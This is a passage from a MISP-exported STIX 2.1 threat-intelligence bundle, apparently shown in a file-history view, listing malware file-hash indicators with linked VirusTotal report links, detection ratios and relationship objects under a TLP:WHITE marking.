"value": "https://www.virustotal.com/file/34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe/analysis/1555216738/",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "9e8d82d4-4886-40e5-b15c-c1f75bb6e0ad"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
|
"value": "36/57",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "eb4ad240-1687-479f-9ae9-55f16edf0601"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--56c96c2d-6b60-480a-a6dd-392718a6b188",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"pattern": "[file:hashes.MD5 = '3a3f7b2c2bea6a70ad62657b8613b1d1' AND file:hashes.SHA1 = 'ca94cde61c2b1640a420c61d2cb9c892b81a30d1' AND file:hashes.SHA256 = '976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "file"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "x-misp-object",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "x-misp-object--b5470b5b-e9e6-4ed2-b7c3-108f1e42b227",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
|
],
|
|
|
|
|
"x_misp_attributes": [
|
|
|
|
|
{
|
|
|
|
|
"type": "datetime",
|
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
|
"value": "2019-04-07T17:10:08",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "605f81fb-6364-412b-a106-39603b9c4e59"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "link",
|
|
|
|
|
"object_relation": "permalink",
|
|
|
|
|
"value": "https://www.virustotal.com/file/976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c/analysis/1554657008/",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "5990199c-faff-4903-808a-bdbba9f7276a"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
|
"value": "36/56",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "f678d42e-bf7a-46c0-af36-7e8b82a6f280"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--548d726e-92df-4311-b2d7-ea098d9a2570",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"pattern": "[file:hashes.MD5 = 'fad9b9a909688f800606c2148b4d0880' AND file:hashes.SHA1 = 'ee44b722df537d53a3e59db178e2be57d7f8e985' AND file:hashes.SHA256 = '62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "file"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "x-misp-object",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "x-misp-object--d2a962b8-e9f1-4db3-a4ab-cc399560f5cd",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:34.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:34.000Z",
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
|
],
|
|
|
|
|
"x_misp_attributes": [
|
|
|
|
|
{
|
|
|
|
|
"type": "datetime",
|
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
|
"value": "2018-12-23T16:55:04",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "a8e523dd-5dd6-466e-86ce-5b009edd7294"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "link",
|
|
|
|
|
"object_relation": "permalink",
|
|
|
|
|
"value": "https://www.virustotal.com/file/62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d/analysis/1545584104/",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "ce52ccac-75fd-4d28-8300-23b0f0c2682d"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
|
"value": "26/57",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "dfb31056-0eac-493e-a0cd-66b3ed501c0c"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--06546ec0-783e-40a7-a681-d2d25f245cf8",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:34.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:34.000Z",
|
|
|
|
|
"pattern": "[file:hashes.MD5 = 'f0cccfa07427442b472a15232765a2eb' AND file:hashes.SHA1 = '6cb397aab13cdcbf0c77aea28431d81b036648ad' AND file:hashes.SHA256 = '31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:34Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "file"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "x-misp-object",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "x-misp-object--5473bd03-6e2e-435d-b979-cca55055af85",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:34.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:34.000Z",
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
|
],
|
|
|
|
|
"x_misp_attributes": [
|
|
|
|
|
{
|
|
|
|
|
"type": "datetime",
|
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
|
"value": "2019-04-07T05:08:51",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "e04d799d-8aaf-4a26-88a6-8836e6095eae"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "link",
|
|
|
|
|
"object_relation": "permalink",
|
|
|
|
|
"value": "https://www.virustotal.com/file/31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756/analysis/1554613731/",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "d9a1cabf-9dfb-4064-a87b-36e6bf32137f"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
|
"value": "34/56",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "41d13690-0b80-401c-bff5-a3a4142fced8"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--2f932e33-d889-4470-9aca-8ffd5769e055",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:34.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:34.000Z",
|
|
|
|
|
"pattern": "[file:hashes.MD5 = 'dccb186234326d4bff449d4416ff6ce4' AND file:hashes.SHA1 = 'a787e2e2f2bcfef92aa5032a67f3e6efcd706cb2' AND file:hashes.SHA256 = 'f031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:34Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "file"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "x-misp-object",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "x-misp-object--66a53076-8934-43d7-b983-ab73ddd29d99",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:35.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:35.000Z",
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
|
],
|
|
|
|
|
"x_misp_attributes": [
|
|
|
|
|
{
|
|
|
|
|
"type": "datetime",
|
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
|
"value": "2019-04-07T05:08:46",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "9075c263-e538-4257-af4a-94d66a3923da"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "link",
|
|
|
|
|
"object_relation": "permalink",
|
|
|
|
|
"value": "https://www.virustotal.com/file/f031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221/analysis/1554613726/",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "f433ead2-68ba-47c2-a043-af1ae435ca12"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
|
"value": "36/55",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "ef17cbe3-8b76-4c29-9210-248ede7d0e42"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--952c0e2d-e595-4f12-a5d4-25ec983c91b6",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:35.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:35.000Z",
|
|
|
|
|
"pattern": "[file:hashes.MD5 = 'b94b6857ed382b66cdfbead83480ee15' AND file:hashes.SHA1 = 'b22e1b7bf6de3fb7572b26c10300309b04efb1b8' AND file:hashes.SHA256 = 'fd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:35Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "file"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "x-misp-object",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "x-misp-object--d4872fd8-7dc8-47d3-85e7-6e5aebe63db6",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:35.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:35.000Z",
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
|
],
|
|
|
|
|
"x_misp_attributes": [
|
|
|
|
|
{
|
|
|
|
|
"type": "datetime",
|
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
|
"value": "2019-04-14T08:40:00",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "99e029db-2803-42d1-97b7-cdd070ac880b"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "link",
|
|
|
|
|
"object_relation": "permalink",
|
|
|
|
|
"value": "https://www.virustotal.com/file/fd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5/analysis/1555231200/",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "82dfb261-8353-453a-8fc5-3ec3f9129822"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
|
"value": "36/59",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "9b8befa3-84b0-4042-8ddd-86b454ceae2a"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--1823da6d-442b-46cf-806d-aac97de195a4",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:35.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:35.000Z",
|
|
|
|
|
"pattern": "[file:hashes.MD5 = 'b83113015a0f817c4d68659d9a1e370a' AND file:hashes.SHA1 = 'ec9c669f2b8c13e94a7ba7c57ccf163c8b8cf060' AND file:hashes.SHA256 = '3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:35Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "file"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "x-misp-object",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "x-misp-object--b5d7ba31-66eb-4bc9-a2c8-5140d36761b8",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:35.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:35.000Z",
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
|
],
|
|
|
|
|
"x_misp_attributes": [
|
|
|
|
|
{
|
|
|
|
|
"type": "datetime",
|
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
|
"value": "2019-03-15T21:23:14",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "211d0bff-f499-4d9f-9b51-f35b3784bc4b"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "link",
|
|
|
|
|
"object_relation": "permalink",
|
|
|
|
|
"value": "https://www.virustotal.com/file/3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f/analysis/1552684994/",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "bd823c0f-8191-4313-a833-5193229cf518"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
|
"value": "6/55",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "92028634-4567-407b-9470-2c3b3295062c"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "relationship",
|
|
|
|
|
"spec_version": "2.1",
|
2024-04-05 12:15:17 +00:00
|
|
|
"id": "relationship--a96edda1-d092-4dd0-af57-c4ec6e515813",
|
2023-04-21 14:44:17 +00:00
|
|
|
"created": "2019-04-27T08:20:12.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:20:12.000Z",
|
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
|
"source_ref": "indicator--332718dd-e3ba-40b1-bb59-06318357f8e2",
|
|
|
|
|
"target_ref": "x-misp-object--ec7ab03e-c8dd-4dd2-886e-cf39dada576c"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "relationship",
|
|
|
|
|
"spec_version": "2.1",
|
2024-04-05 12:15:17 +00:00
|
|
|
"id": "relationship--344620c9-c971-4ce1-966a-5b9e488737e3",
|
2023-04-21 14:44:17 +00:00
|
|
|
"created": "2019-04-27T08:21:20.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:21:20.000Z",
|
|
|
|
|
"relationship_type": "connects-to",
|
|
|
|
|
"source_ref": "indicator--332718dd-e3ba-40b1-bb59-06318357f8e2",
|
|
|
|
|
"target_ref": "indicator--5cc410e3-9a44-4c3a-abb2-498602de0b81"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "relationship",
|
|
|
|
|
"spec_version": "2.1",
|
2024-04-05 12:15:17 +00:00
|
|
|
"id": "relationship--828352e8-cc6c-461b-aa18-b2d096986df2",
|
2023-04-21 14:44:17 +00:00
|
|
|
"created": "2019-04-27T08:42:22.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:42:22.000Z",
|
|
|
|
|
"relationship_type": "connects-to",
|
|
|
|
|
"source_ref": "indicator--332718dd-e3ba-40b1-bb59-06318357f8e2",
|
|
|
|
|
"target_ref": "x-misp-object--5cc4152b-efe8-4b4e-a4ff-4c8c02de0b81"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "relationship",
|
|
|
|
|
"spec_version": "2.1",
|
2024-04-05 12:15:17 +00:00
|
|
|
"id": "relationship--14b0f5bb-f5e5-4de5-bac5-a58d90a9e163",
|
2023-04-21 14:44:17 +00:00
|
|
|
"created": "2019-04-27T08:21:55.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:21:55.000Z",
|
|
|
|
|
"relationship_type": "connected-from",
|
|
|
|
|
"source_ref": "indicator--5cc410e3-9a44-4c3a-abb2-498602de0b81",
|
|
|
|
|
"target_ref": "indicator--5cc410ae-1374-4513-b215-479e02de0b81"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "relationship",
|
|
|
|
|
"spec_version": "2.1",
|
2024-04-05 12:15:17 +00:00
|
|
|
"id": "relationship--78d3dd0d-6663-4d17-a7cb-3983707cab4e",
|
2023-04-21 14:44:17 +00:00
|
|
|
"created": "2019-04-27T08:51:35.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:35.000Z",
|
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
|
"source_ref": "indicator--6264284d-c9d5-4c12-8ba3-0f3c4ac9231a",
|
|
|
|
|
"target_ref": "x-misp-object--c584310f-cfa6-4ca0-b283-88853eff679e"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "relationship",
|
|
|
|
|
"spec_version": "2.1",
|
2024-04-05 12:15:17 +00:00
|
|
|
"id": "relationship--5688cf5d-171b-401e-b6db-3ae4cd296575",
|
2023-04-21 14:44:17 +00:00
|
|
|
"created": "2019-04-27T08:51:35.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:35.000Z",
|
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
|
"source_ref": "indicator--a6383e65-36cc-4e3a-8d2e-439afdb5a58b",
|
|
|
|
|
"target_ref": "x-misp-object--dc71966f-e4cf-4026-a133-50090fd4b95b"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "relationship",
|
|
|
|
|
"spec_version": "2.1",
|
2024-04-05 12:15:17 +00:00
|
|
|
"id": "relationship--4df963aa-df8f-441b-8691-746d3c84f53e",
|
2023-04-21 14:44:17 +00:00
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
|
"source_ref": "indicator--7c1420e2-b2c6-455a-ae2d-675b32ffa908",
|
|
|
|
|
"target_ref": "x-misp-object--67696428-f0ea-4068-b00a-f669ee50ae03"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "relationship",
|
|
|
|
|
"spec_version": "2.1",
|
2024-04-05 12:15:17 +00:00
|
|
|
"id": "relationship--d1e4b811-8eb2-4771-a5e7-8bb521dccb9c",
|
2023-04-21 14:44:17 +00:00
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
|
"source_ref": "indicator--45275180-143d-4606-9cd3-6bc35646d412",
|
|
|
|
|
"target_ref": "x-misp-object--5a3041a4-6ba6-4ce5-8d08-59693a3c3703"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "relationship",
|
|
|
|
|
"spec_version": "2.1",
|
2024-04-05 12:15:17 +00:00
|
|
|
"id": "relationship--00a0e852-f869-48e3-982f-fe0563bba27f",
|
2023-04-21 14:44:17 +00:00
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
|
"source_ref": "indicator--56c96c2d-6b60-480a-a6dd-392718a6b188",
|
|
|
|
|
"target_ref": "x-misp-object--b5470b5b-e9e6-4ed2-b7c3-108f1e42b227"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "relationship",
|
|
|
|
|
"spec_version": "2.1",
|
2024-04-05 12:15:17 +00:00
|
|
|
"id": "relationship--428a5c1e-e690-4ab7-9299-f1c7cb62c846",
|
2023-04-21 14:44:17 +00:00
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
|
"source_ref": "indicator--548d726e-92df-4311-b2d7-ea098d9a2570",
|
|
|
|
|
"target_ref": "x-misp-object--d2a962b8-e9f1-4db3-a4ab-cc399560f5cd"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "relationship",
|
|
|
|
|
"spec_version": "2.1",
|
2024-04-05 12:15:17 +00:00
|
|
|
"id": "relationship--c7e409d3-15cf-48af-9335-be17e90ba8f5",
|
2023-04-21 14:44:17 +00:00
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
|
"source_ref": "indicator--06546ec0-783e-40a7-a681-d2d25f245cf8",
|
|
|
|
|
"target_ref": "x-misp-object--5473bd03-6e2e-435d-b979-cca55055af85"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "relationship",
|
|
|
|
|
"spec_version": "2.1",
|
2024-04-05 12:15:17 +00:00
|
|
|
"id": "relationship--d495eb83-bb8d-4a9b-b147-6fee2b7f77b4",
|
2023-04-21 14:44:17 +00:00
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
|
"source_ref": "indicator--2f932e33-d889-4470-9aca-8ffd5769e055",
|
|
|
|
|
"target_ref": "x-misp-object--66a53076-8934-43d7-b983-ab73ddd29d99"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "relationship",
|
|
|
|
|
"spec_version": "2.1",
|
2024-04-05 12:15:17 +00:00
|
|
|
"id": "relationship--c1aa6872-94cb-4dea-86e5-9f6a72cbb392",
|
2023-04-21 14:44:17 +00:00
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
|
"source_ref": "indicator--952c0e2d-e595-4f12-a5d4-25ec983c91b6",
|
|
|
|
|
"target_ref": "x-misp-object--d4872fd8-7dc8-47d3-85e7-6e5aebe63db6"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "relationship",
|
|
|
|
|
"spec_version": "2.1",
|
2024-04-05 12:15:17 +00:00
|
|
|
"id": "relationship--6e29b60b-1642-49e4-a253-79a672c93ce6",
|
2023-04-21 14:44:17 +00:00
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
|
"source_ref": "indicator--1823da6d-442b-46cf-806d-aac97de195a4",
|
|
|
|
|
"target_ref": "x-misp-object--b5d7ba31-66eb-4bc9-a2c8-5140d36761b8"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "marking-definition",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
|
|
|
|
|
"created": "2017-01-20T00:00:00.000Z",
|
|
|
|
|
"definition_type": "tlp",
|
|
|
|
|
"name": "TLP:WHITE",
|
|
|
|
|
"definition": {
|
|
|
|
|
"tlp": "white"
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
]
|
|
|
|
|
}
|
